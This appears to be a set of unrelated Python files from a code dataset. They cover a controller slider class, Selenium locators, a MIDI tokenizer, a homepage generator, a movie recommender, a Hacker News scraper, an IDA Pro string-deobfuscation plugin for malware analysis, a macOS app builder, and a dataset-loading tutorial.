if self._precision_mode:
return SLIDER_MODE_PRECISION_SLIDER
else:
return SLIDER_MODE_SLIDER
else:
return SLIDER_MODE_OFF
def update(self):
if self._enabled:
if self._mode == SLIDER_MODE_TOGGLE:
self._update_toggle()
elif self._mode == SLIDER_MODE_SMALL_ENUM:
self._update_small_enum()
elif self._mode == SLIDER_MODE_BIG_ENUM:
self._update_big_enum()
elif (self._mode == SLIDER_MODE_SLIDER):
self._update_slider()
elif (self._mode == SLIDER_MODE_PRECISION_SLIDER):
self._update_precision_slider()
else:
self._update_off()
def reset(self):
self._update_off()
def reset_if_no_parameter(self):
if self._parameter_to_map_to == None:
self.reset()
def _update_off(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
self._update_buttons(tuple(v))
def _update_toggle(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
if self._value==self._max:
v[0]="Device.Toggle.On"
else:
v[0]="Device.Toggle.Off"
self._update_buttons(tuple(v))
def _update_small_enum(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
for index in range(int(self._range+1)):
if self._value==index+self._min:
v[index]="Device.Enum.On"
else:
v[index]="Device.Enum.Off"
self._update_buttons(tuple(v))
def _update_big_enum(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
if self._value>self._min:
v[3]="Device.BigEnum.On"
else:
v[3]="Device.BigEnum.Off"
if self._value<self._max:
v[4]="Device.BigEnum.On"
else:
v[4]="Device.BigEnum.Off"
self._update_buttons(tuple(v))
def _update_slider(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
for index in range(len(self._buttons)):
if self._value >=self._value_map[index]*self._range+self._min:
v[index]="Device.Slider.On"
else:
v[index]="Device.Slider.Off"
self._update_buttons(tuple(v))
def _update_precision_slider(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
if self._value>self._min:
v[3]="Device.PrecisionSlider.On"
else:
v[3]="Device.PrecisionSlider.Off"
if self._value<self._max:
v[4]="Device.PrecisionSlider.On"
else:
v[4]="Device.PrecisionSlider.Off"
self._update_buttons(tuple(v))
def _update_buttons(self, buttons):
assert isinstance(buttons, tuple)
assert (len(buttons) == len(self._buttons))
for index in range(len(self._buttons)):
self._buttons[index].set_on_off_values(buttons[index],buttons[index])
if buttons[index]>0:
self._buttons[index].turn_on()
else:
self._buttons[index].turn_off()
def _button_value(self, value, sender):
assert isinstance(value, int)
assert (sender in self._buttons)
self._last_sent_value = -1
if (self._parameter_to_map_to != None and self._enabled and ((value != 0) or (not sender.is_momentary()))):
if (value != self._last_sent_value):
index_of_sender = list(self._buttons).index(sender)
if (self._mode == SLIDER_MODE_TOGGLE) and index_of_sender==0:
if self._value == self._max:
self._parameter_to_map_to.value = self._min
else:
self._parameter_to_map_to.value = self._max
elif self._mode == SLIDER_MODE_SMALL_ENUM:
self._parameter_to_map_to.value = index_of_sender + self._min
elif self._mode == SLIDER_MODE_BIG_ENUM:
if index_of_sender>=4:
inc = 2**(index_of_sender - 3 -1)
if self._value + inc <= self._max:
self._parameter_to_map_to.value += inc
else:
self._parameter_to_map_to.value = self._max
else:
inc = 2**(4 - index_of_sender -1)
if self._value - inc >= self._min:
self._parameter_to_map_to.value -= inc
else:
self._parameter_to_map_to.value = self._min
elif (self._mode == SLIDER_MODE_SLIDER):
self._parameter_to_map_to.value = self._value_map[index_of_sender]*self._range + self._min
elif (self._mode == SLIDER_MODE_PRECISION_SLIDER):
inc = float(self._range) / 128
if self._range>7 and inc<1:
inc=1
if index_of_sender >= 4:
inc = inc * 2**(index_of_sender - 3-1)
if self._value + inc <= self._max:
self._parameter_to_map_to.value += inc
else:
self._parameter_to_map_to.value = self._max
else:
inc = inc * 2**(4 - index_of_sender-1)
if self._value - inc >= self._min:
self._parameter_to_map_to.value -= inc
else:
self._parameter_to_map_to.value = self._min
self.notify_value(value)
if self._parent is not None:
self._parent._update_OSD()
def _on_parameter_changed(self):
assert (self._parameter_to_map_to != None)
if self._parent is not None:
self._parent._update_OSD()
self.update()
|
nilq/baby-python
|
python
|
from selenium.webdriver.common.by import By
class MainPageLocators():
SEARCH_STRING = (By.ID, 'text')
SUGGEST = (By.CSS_SELECTOR, '[role=listbox]')
IMAGES = (By.CSS_SELECTOR, '[data-statlog="services_new.item.images.2"]')
class ResultPageLocators():
FIRST_RESULT = (By.CSS_SELECTOR, '[data-cid="0"] .organic__path b')
NEXT_RESULTS = (By.CSS_SELECTOR, '.Organic-Path b')
class ImagePageLocators():
CATEGORY = (By.CSS_SELECTOR, '.PopularRequestList-Item_pos_0')
CATEGORY_NAME = (By.CSS_SELECTOR, '.PopularRequestList-SearchText')
TEXT_IN_SEARCH_STRING = (By.CSS_SELECTOR, '.input__box input')
FIRST_IMAGE = (By.CSS_SELECTOR, '.serp-item__preview')
IMAGE_DATA = (By.CSS_SELECTOR, '.MMImage-Origin')
NEXT_IMAGE_BUTTON = (By.CSS_SELECTOR, '.CircleButton_type_next')
PREVIOUS_IMAGE_BUTTON = (By.CSS_SELECTOR, '.CircleButton_type_prev')
|
nilq/baby-python
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
def env_or_default(name, d):
from os import environ
try:
a = environ[name]
if a:
return type(d)(a)
else:
return d
except Exception:
return d
def print_stats(steps, t_diff, dl):
from time import strftime
print(
'{:s} | stp: {:d} time: {:.5f} v: {:d} e: {:d}'.format(
strftime('%d/%m/%Y %H:%M:%S'),
steps,
t_diff,
dl.get_vnum(),
dl.get_enum()
)
)
return
|
nilq/baby-python
|
python
|
import glob, os, numpy
from music21 import converter, instrument, note, chord
from itertools import chain
import json
import pickle
PATH = '../Bach-Two_Part_Inventions_MIDI_Transposed/txt'
OUTPUT_PATH = '../Bach-Two_Part_Inventions_MIDI_Transposed/txt_tokenized'
CHUNK_SIZE = 4 # MEASURES
def write_pickle(filename, obj):
with open(filename, 'wb') as f:
pickle.dump(obj, f, protocol=pickle.HIGHEST_PROTOCOL)
def read_pickle(filename):
with open(filename) as f:
return pickle.load(f)
def generate_duration_tokens(directory):
symbols = set()
for file in glob.glob(os.path.join(directory, '*.txt')):
#print(file)
with open(file) as f:
for line in f:
tokens = line.strip().split(' ')
for i, token in enumerate(tokens):
# Skip MIDI or REST tokens
if i % 2 == 0:
continue
symbols.add(token)
symbol_list = sorted(symbols)
symbol_to_index = {s: idx for idx,s in enumerate(symbol_list)}
index_to_symbol = {idx: s for idx,s in enumerate(symbol_list)}
return symbol_to_index, index_to_symbol
def simplify_text(directory, output_directory, symbol_to_index):
for file in glob.glob(os.path.join(PATH, '*.txt')):
#print(file)
output_filename = os.path.join(OUTPUT_PATH, os.path.basename(file))
with open(file) as f:
with open(output_filename, 'w') as outfile:
for line in f:
line_out = []
tokens = line.strip().split(' ')
for i, token in enumerate(tokens):
# Don't tokenize MIDI or REST tokens
if i % 2 == 0:
line_out.append(token)
else:
line_out.append(str(symbol_to_index[token]))
outfile.write(' '.join(line_out) + '\n')
if __name__ == '__main__':
symbol_to_index, index_to_symbol = generate_duration_tokens(PATH)
print (symbol_to_index)
simplify_text(PATH, OUTPUT_PATH, symbol_to_index)
write_pickle(os.path.join(OUTPUT_PATH, 'symbol_to_index.pkl'), symbol_to_index)
print('DONE!')
|
nilq/baby-python
|
python
|
import webbrowser
import os
import re
# Styles and scripting for the page
main_page_head = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Learn To Code Pakistan will help you master the art of programming for free!">
<meta name="author" content="">
<title>Learn To Code Pakistan</title>
<!-- Bootstrap core CSS -->
<link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom fonts for this template -->
<link href="vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Merriweather:400,300,300italic,400italic,700,700italic,900,900italic' rel='stylesheet' type='text/css'>
<!-- Plugin CSS -->
<link href="vendor/magnific-popup/magnific-popup.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="css/creative.min.css" rel="stylesheet">
</head>
<body id="page-top">
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-light fixed-top" id="mainNav">
<div class="container">
<a class="navbar-brand js-scroll-trigger" href="#page-top">Learn To Code Pakistan</a>
<button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarResponsive">
<ul class="navbar-nav ml-auto">
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#about">About</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#services">What We Offer?</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#contact">Instructor?</a>
</li>
</ul>
</div>
</div>
</nav>
<header class="masthead text-center text-white d-flex">
<div class="container my-auto">
<div class="row">
<div class="col-lg-10 mx-auto">
<h1 class="text-uppercase">
<strong>Your One Stop For Programming Tutorials</strong>
</h1>
<hr>
</div>
<div class="col-lg-8 mx-auto">
<a class="btn btn-primary btn-xl js-scroll-trigger" href="#about">What's inside?</a>
</div>
</div>
</div>
</header>
<section class="bg-primary" id="about">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading text-white">We've got what you need!</h2>
<hr class="light my-4">
<p class="text-faded mb-4">From Python Tutorials which will help become the master of Data Science to C++ and Unity for object oriented programming to make advanced games, our website is the has all! </p>
<a class="btn btn-light btn-xl js-scroll-trigger" href="#services">Take a look!</a>
</div>
</div>
</div>
</section>
<section id="services">
<div class="container">
<div class="row">
<div class="col-lg-12 text-center">
<h2 class="section-heading">What We Offer?</h2>
<hr class="my-4">
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-diamond text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">No Ads!</h3>
<p class="text-muted mb-0">We use cryptocurrency mining to keep our website funded, no pesky ads allowed!</p>
</div>
</div>
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-video-camera text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">Video Tutorials</h3>
<p class="text-muted mb-0">Our instructors are highly qualified individuals which will explain each and everything with examples and much more for a fun learning experience!</p>
</div>
</div>
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-user text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">Are You An Instructor?</h3>
<p class="text-muted mb-0">Use the contact options below and we will get your tutorials up on our website ASAP</p>
</div>
</div>
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-file-text text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">Quizzes</h3>
<p class="text-muted mb-0">No learning experience is complete without the final evaluation, our quizzes are designed to make you ponder and understand the fundamentals of the course you are taking.</p>
</div>
</div>
</div>
</div>
</section>
<section class="bg-dark text-white">
<div class="container text-center">
<h2 class="mb-4">Ready to Learn?</h2>
<a class="btn btn-light btn-xl sr-button" href="file:///D:/Downloads/update 11-1-2018/proj/startbootstrap-creative-gh-pages/learntocode.html">Take Your First Course!</a>
</div>
</section>
<section id="contact">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading">Instructor?</h2>
<hr class="my-4">
<p class="mb-5">Ready to start your next project with us? That's great! Give us a call or send us an email and we will get back to you as soon as possible!</p>
</div>
</div>
<div class="row">
<div class="col-lg-4 ml-auto text-center">
<i class="fa fa-phone fa-3x mb-3 sr-contact"></i>
<p>03365545494</p>
</div>
<div class="col-lg-4 mr-auto text-center">
<i class="fa fa-envelope-o fa-3x mb-3 sr-contact"></i>
<p>
<a href="mailto:instructor@learntocode.pk">instructor@learntocode.pk</a>
</p>
</div>
</div>
</div>
</section>
<!-- Bootstrap core JavaScript -->
<script src="vendor/jquery/jquery.min.js"></script>
<script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<!-- Plugin JavaScript -->
<script src="vendor/jquery-easing/jquery.easing.min.js"></script>
<script src="vendor/scrollreveal/scrollreveal.min.js"></script>
<script src="vendor/magnific-popup/jquery.magnific-popup.min.js"></script>
<!-- Custom scripts for this template -->
<script src="js/creative.min.js"></script>
</body>
</html>
'''
def homepage():
# Create or overwrite the output file
output_file = open('homepage.html', 'w')
# Output the file
output_file.write(main_page_head)
output_file.close()
# open the output file in the browser (in a new tab, if possible)
url = os.path.abspath(output_file.name)
webbrowser.open('file://' + url, new=2)
homepage()
|
nilq/baby-python
|
python
|
# demo - opencv
import cv2
# Black and White (gray scale)
img = cv2.imread ('lotus.jpg', 1 )
cv2.imshow('lotus', img)
cv2.waitKey(0)
# cv2.waitKey(2000)
cv2.destroyAllWindows()
|
nilq/baby-python
|
python
|
'''
import data here and have utility functions that could help
'''
import pandas as pd
import pickle
from thefuzz import fuzz, process
ratings = pd.read_csv('./data/ml-latest-small/ratings.csv')
movies = pd.read_csv('./data/ml-latest-small/movies.csv')
# import nmf model
with open('./nmf_recommender.pkl', 'rb') as file:
nmf_model = pickle.load(file)
# import neighborhood model
with open('./neighbors_recommender.pkl', 'rb') as file:
neighbor_model = pickle.load(file)
def movie_title_search(fuzzy_titles):
'''
does a fuzzy search and returns best matched movie
'''
extracted_titles =[]
choices = movies['title'].tolist()
for fuzzy_title in fuzzy_titles:
extracted_title =process.extract(fuzzy_title, choices, limit=1)
extracted_title = extracted_title[0][0]
extracted_titles.append(extracted_title)
return extracted_title
def movie_to_id(extracted_titles):
'''
converts movie title to id for use in algorithms
'''
movieId = movies.set_index('title').loc[extracted_titles].movieId
movieId = movieId.tolist()
return movieId
def id_to_movie_title(movieId):
'''
converts movie Id to title
'''
title_genre_df = movies.set_index('movieId').loc[movieId]
recommendations_title = title_genre_df.title
return recommendations_title
|
nilq/baby-python
|
python
|
from bs4 import BeautifulSoup
import requests
import pprint
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'}
base_url = 'https://news.ycombinator.com/news'
response = requests.get(base_url, headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
with open('hacker_news.html', 'w') as file:
file.write(soup.prettify())
links = soup.select('.storylink')
sub_text = soup.select('.subtext')
def sort_by_votes(hnlist):
#sort by votes by descending order
return sorted(hnlist, key = lambda k:k['votes'], reverse = True)
def create_custom_hacker_news(links, sub_text):
hn = []
for index, item in enumerate(links):
vote = sub_text[index].select('.score')
if len(vote):
points = int(vote[0].getText().strip(' points'))
if points > 150:
title = links[index].getText()
href = links[index].get('href', None)
hn.append({'title':title,'href':href,'votes':points})
return sort_by_votes(hn)
if __name__ == "__main__":
custom_hn_lists = create_custom_hacker_news(links, sub_text)
pprint.pprint(custom_hn_lists)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
#
# __main__.py
"""
CLI entry point.
"""
#
# Copyright (c) 2020 Dominic Davis-Foster <dominic@davis-foster.co.uk>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# stdlib
import sys
# 3rd party
import click
from consolekit import CONTEXT_SETTINGS
# this package
from flake8_prettycount.application import Application
__all__ = ["main"]
@click.command(context_settings={"ignore_unknown_options": True, "allow_extra_args": True, **CONTEXT_SETTINGS})
@click.pass_context
def main(ctx: click.Context):
"""
Wrapper around flake8 providing a formatted count at the end.
All options and arguments are passed through to flake8.
"""
app = Application()
app.run(ctx.args[:])
app.exit()
if __name__ == "__main__":
sys.exit(main(obj={}))
|
nilq/baby-python
|
python
|
from typing import Any, Union
from bot.event import Event, EventType
from pydantic.utils import deep_update
def event(
event_data: Union[str, dict[str, Any]],
event_type: EventType = EventType.NEW_MESSAGE,
) -> Event:
default = {
"chat": {"chatId": "test"},
"from": "someone@mail.ru",
"msgId": 999,
}
if isinstance(event_data, str):
# for simple cases
default["text"] = event_data
else:
default = deep_update(default, event_data)
return Event(event_type, default)
def part(type: str, **payload: Any) -> dict[str, Any]:
return {"type": type, "payload": payload}
def mention(user_id: int) -> dict[str, Any]:
return part("mention", userId=user_id)
def odesli_response() -> dict[str, Any]:
return {
"entityUniqueId": "ITUNES_SONG::1443109064",
"userCountry": "US",
"pageUrl": "https://song.link/us/i/1443109064",
"entitiesByUniqueId": {
"ITUNES_SONG::1443109064": {
"id": "1443109064",
"type": "song",
"title": "Kitchen",
"artistName": "Kid Cudi",
"thumbnailUrl": "https://is4-ssl.mzstatic.com/image/thumb/Music118/v4/ac/2c/60/ac2c60ad-14c3-a8b2-d962-dc08de2da546/source/512x512bb.jpg",
"thumbnailWidth": 512,
"thumbnailHeight": 512,
"apiProvider": "itunes",
"platforms": ["appleMusic", "itunes"],
},
},
"linksByPlatform": {
"appleMusic": {
"url": "https://music.apple.com/us/album/kitchen/1443108737?i=1443109064&uo=4&app=music&ls=1&at=1000lHKX",
"nativeAppUriMobile": "music://music.apple.com/us/album/kitchen/1443108737?i=1443109064&uo=4&app=music&ls=1&at=1000lHKX",
"nativeAppUriDesktop": "itms://music.apple.com/us/album/kitchen/1443108737?i=1443109064&uo=4&app=music&ls=1&at=1000lHKX",
"entityUniqueId": "ITUNES_SONG::1443109064",
},
"spotify": {
"url": "https://open.spotify.com/track/0Jcij1eWd5bDMU5iPbxe2i",
"nativeAppUriDesktop": "spotify:track:0Jcij1eWd5bDMU5iPbxe2i",
"entityUniqueId": "SPOTIFY_SONG::0Jcij1eWd5bDMU5iPbxe2i",
},
"youtube": {
"url": "https://www.youtube.com/watch?v=w3LJ2bDvDJs",
"entityUniqueId": "YOUTUBE_VIDEO::w3LJ2bDvDJs",
},
},
}
|
nilq/baby-python
|
python
|
import cv2
from matplotlib import pyplot as plt
img = cv2.imread('open')
|
nilq/baby-python
|
python
|
from pathlib import Path
from flask import current_app
from flask_marshmallow import Marshmallow
from PIL import Image
from flask_app.commons.util import pil_to_base64
from flask_app.database.database import Version, Card
ma = Marshmallow()
class VersionSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Version
class CardSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Card
exclude = ('img_path',)
img = ma.Method("serialize_img")
def serialize_img(self, obj: Card):
img_path = (Path(current_app.config["ASSETS_PATH"])
/ obj.img_path).resolve()
img = Image.open(img_path)
return pil_to_base64(img)
version_schema = VersionSchema()
card_list_schema = CardSchema(many=True)
|
nilq/baby-python
|
python
|
# coding=utf-8
#!/bin/python3
# 这个插件用来去掉Equation的xor系列混淆
# 仅仅支持python 3,只在ida pro 7.7下测试过
# 将本文件放到IDA安装目录的plugins目录下,然后启动ida,在ida View中把光标放在解码函数开始,就可以在 Edit->Plugings->Xor Batch Deobfuscation
# 也可以使用快捷键Ctrl+Shift+D进行反混淆
import sys
try:
import idaapi
import idc
import idautils
import flare_emu
# import hexdump
except ImportError:
print("[FlareDeobfacatePlugin] Dependencies missing, Please check ida python and flare_emu is installed")
sys.exit()
VERSION = "0.1.0"
def deobfuscate_function():
# for xref in idautils.XrefsTo(idc.get_screen_ea(), 0):
# print(xref.type, idautils.XrefTypeName(xref.type), 'from', hex(xref.frm), 'to', hex(xref.to))
eh = flare_emu.EmuHelper()
info = idaapi.get_inf_structure()
if info.is_64bit():
dx = "rdx"
ax = "rax"
else:
dx = "edx"
ax = "eax"
ea = idc.get_screen_ea()
for xref in idautils.XrefsTo(ea, 0):
addr_call = xref.frm
addr_before = idc.prev_head(addr_call) # 前一个指令
addr_before = idc.prev_head(addr_before) # 前一个指令
addr_after = idc.next_head(addr_call) # 后一个指令
# 校验前一个指令是在传参,符合 mov eax, xxx
if idc.print_insn_mnem(addr_before) == "mov" and idc.print_operand(addr_before, 0) == dx:
#print("0x{:x} => 0x{:x}".format(addr_before, addr_call))
eh.emulateRange(addr_before, endAddr=addr_after, skipCalls=False)
ret = eh.getRegVal( ax )
print( "decrypted at 0x%x: %s" %( addr_call ,eh.getEmuString(ret) ))
# 设置注释
idc.set_cmt(addr_call, "decrypted: " + eh.getEmuString(ret).decode(), 0)
print ("Deobfuscated")
class XorPlugin(idaapi.plugin_t):
flags = idaapi.PLUGIN_PROC
comment = "Equation 字符串反混淆"
help = "一个小工具,用于反混淆Equation的字符串混淆"
wanted_name = "Xor Batch Deobfuscation"
# wanted_hotkey = "Ctrl+Shift+D"
def init(self):
return idaapi.PLUGIN_KEEP
def term(self):
pass
def run(self, arg):
deobfuscate_function()
def PLUGIN_ENTRY():
return XorPlugin()
|
nilq/baby-python
|
python
|
__all__ = ['App']
import control_characters
import mdfind
import os
import plistlib
import stat
import subprocess
import sys
from writable_property import writable_property
"""
path/to/<name>.py class Name(mac_app.App)
output:
~/Applications/.mac-app-generator/<name>.app (customizable)
app logs:
~/Library/Logs/Applications/<name>/out.log (customizable)
~/Library/Logs/Applications/<name>/err.log (customizable)
app files:
<name>.app/Contents/MacOS/executable bash wrapper (hack to keep app visible)
<name>.app/Contents/MacOS/launchd.plist launchd.plist
<name>.app/Contents/MacOS/script (your class file)
"""
LOGS = os.path.join(os.environ["HOME"], "Library/Logs/Applications")
CODE = """#!/usr/bin/env bash
# LaunchAgent required to keep app visible in Dock
set "${0%/*}"/launchd.plist
trap "launchctl unload '$1'" EXIT
PlistBuddy() { /usr/libexec/PlistBuddy "$@"; }
PlistBuddy -c "Delete WorkingDirectory" -c "Add WorkingDirectory string ${0%/*}" "$1"
PlistBuddy -c "Delete Program" -c "Add Program string ${0%/*}"/script "$1"
Label="$(PlistBuddy -c "Print Label" "$1")"
# logs must exists or launchd will create logs with root permissions
logs="$(PlistBuddy -c "Print StandardErrorPath" -c "Print StandardOutPath" "$1")"
dirs="$(echo "$logs" | grep / | sed 's#/[^/]*$##' | uniq)"
( IFS=$'\\n'; set -- $dirs; [ $# != 0 ] && mkdir -p "$@" )
launchctl unload "$1" 2> /dev/null; launchctl load -w "$1"
while :; do sleep 0.3 && launchctl list "$Label" | grep -q PID || exit 0; done
"""
def dirname(path):
return os.path.dirname(path)
def write(path, data):
"""write a dictionary to a plist file"""
path = os.path.abspath(os.path.expanduser(path))
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
data = {k: v for k, v in data.items() if v is not None}
if hasattr(plistlib, "dump"):
plistlib.dump(data, open(path, 'wb'))
else:
plistlib.writePlist(data, path)
class App:
"""Mac app generator. writable properties: `app_folder`, `app_name`, `app_path`, `app_code`, `app_script`, `app_image`, `app_stderr`, `app_stdout`, `app_env`. methods: `create_app()`"""
app_env = dict((k, control_characters.remove(str(v)))
for k, v in os.environ.items())
def __init__(self, **kwargs):
for k, v in kwargs.items():
if v is not None:
setattr(self, k, v)
@writable_property
def app_name(self):
"""app name. default is class name
app name concepts:
1) custom name self._app_name with @app_name.setter
2) class name self.__class__.__name__.lower().replace("_", "-")
3) module name (os.path.splitext(os.path.basename(self.app_script))[0].replace("_", "-"))
"""
return self.__class__.__name__.lower().replace("_", "-")
@writable_property
def app_folder(self):
"""app folder. default is `~/Applications/.appify/`"""
return os.path.expanduser("~/Applications/.mac-app-generator")
@writable_property
def app_script(self):
"""source script path. default is class module file"""
return sys.modules[self.__class__.__module__].__file__
@writable_property
def app_code(self):
"""source code string"""
return open(self.app_script).read()
@writable_property
def app_path(self):
"""app path. `app_folder`+`app_name`"""
path = os.path.join(self.app_folder, self.app_name)
return "%s.app" % path if os.path.splitext(path)[1] != ".app" else path
@writable_property
def app_image(self):
"""app image. default is `mdfind kMDItemFSName=<app_name>.png` result"""
filename = "%s.png" % self.app_name
matches = mdfind.mdfind(["kMDItemFSName=%s" % filename]).splitlines()
if matches and os.path.exists(matches[0]) and os.path.isfile(matches[0]):
return matches[0]
@writable_property
def app_stdout(self):
"""stdout path. default is `~/Library/Logs/Applications/<name>/out.log`"""
return os.path.join(LOGS, self.app_name, "out.log")
@writable_property
def app_stderr(self):
"""stderr path. default is `~/Library/Logs/Applications/<name>/err.log`"""
return os.path.join(LOGS, self.app_name, "err.log")
def create_app(self):
"""create Mac app"""
if ".app/" not in os.getcwd():
self.create_app_executable()
self.create_app_script()
if self.app_image:
self.create_app_icon()
self.create_app_info()
self.create_app_launchd()
self.refresh_app()
return self
def create_app_launchd(self):
Label = "%s.app" % self.app_name
"""<Program> and <WorkingDirectory> are created at runtime"""
data = dict(
Label=Label,
RunAtLoad=True,
EnvironmentVariables=self.app_env,
StandardOutPath=os.path.expanduser(self.app_stdout),
StandardErrorPath=os.path.expanduser(self.app_stderr)
)
path = os.path.join(self.app_path, "Contents",
"MacOS", "launchd.plist")
write(path, data)
def create_app_executable(self):
"""create app executable file"""
path = os.path.join(self.app_path, "Contents", "MacOS", "executable")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
open(path, "w").write(CODE)
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def create_app_script(self):
"""create app script file"""
path = os.path.join(self.app_path, "Contents", "MacOS", "script")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
open(path, "w").write(self.app_code)
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def create_app_icon(self):
"""create app icon"""
if not self.app_image:
raise OSError('app_image unknown')
if not os.path.exists(self.app_image):
raise OSError('%s NOT EXISTS' % self.app_image)
path = os.path.join(self.app_path, "Contents",
"Resources", "Icon.icns")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
args = ["/usr/bin/sips", "-s", "format",
"icns", self.app_image, "--out", path]
subprocess.check_call(args, stdout=subprocess.PIPE)
def create_app_info(self):
path = os.path.join(self.app_path, "Contents", "Info.plist")
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
data = dict(CFBundleExecutable="executable")
if self.app_image:
data.update(CFBundleIconFile="Icon.icns")
write(path, data)
def refresh_app(self):
"""remove .DS_Store and touch folder"""
for folder in [self.app_path, os.path.dirname(self.app_path)]:
try:
f = os.path.join(folder, ".DS_Store")
if os.path.exists(f):
os.unlink(f)
os.utime(folder, None)
except PermissionError:
pass
return self
def __str__(self):
return '<App "%s">' % self.app_path
def __repr__(self):
return self.__str__()
|
nilq/baby-python
|
python
|
from pymongo import MongoClient
client = MongoClient()
def get_db():
return client['parallel_chat']
|
nilq/baby-python
|
python
|
import numpy as np
import os
# Readme_2_data_abstracts showed how the data abstracts work.
# Technically, they embody all functionality to work with data
# This part introduces the dataset class, which is based on a dictseqabstract
# This means that you can use it in a similar way.
# However it has additional functionality such as cross validation loading/saving, subsetting, ..
# This part mainly forces you to define datasets in terms of classes in a generic framework to allow
# easy reuse between researchers.
# -------------------------------------------------------------------------
### class example
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.summary()
# -------------------------------------------------------------------------
### class example with data selection
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.select import random_subsample
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')},
select = random_subsample(ratio=0.3))
db.summary()
# -------------------------------------------------------------------------
### class example and xval
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.xval import random_kfold
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.set_xval(random_kfold(folds=4,val_frac=1/3))
xval = db.get_xval_set(fold=0,set='train')
# -------------------------------------------------------------------------
### class example and xval with xval saving for later reuse
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.xval import random_kfold
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.set_xval(random_kfold(folds=4,val_frac=1/3), save_path='xval')
xval = db.get_xval_set(fold=0,set='train')
# -------------------------------------------------------------------------
### class example and xval from the dataset class based on an item
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataset.xval import xval_from_item
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data')})
db.add('set', ['test'] * len(db))
db.set_xval(xval_from_item(key='set'))
xval = db.get_xval_set(fold=0,set='test')
# -------------------------------------------------------------------------
### Feature extraction
### paths/feat is a mandatory field that should be added when doing feature extraction
### as it determines where the features are stored
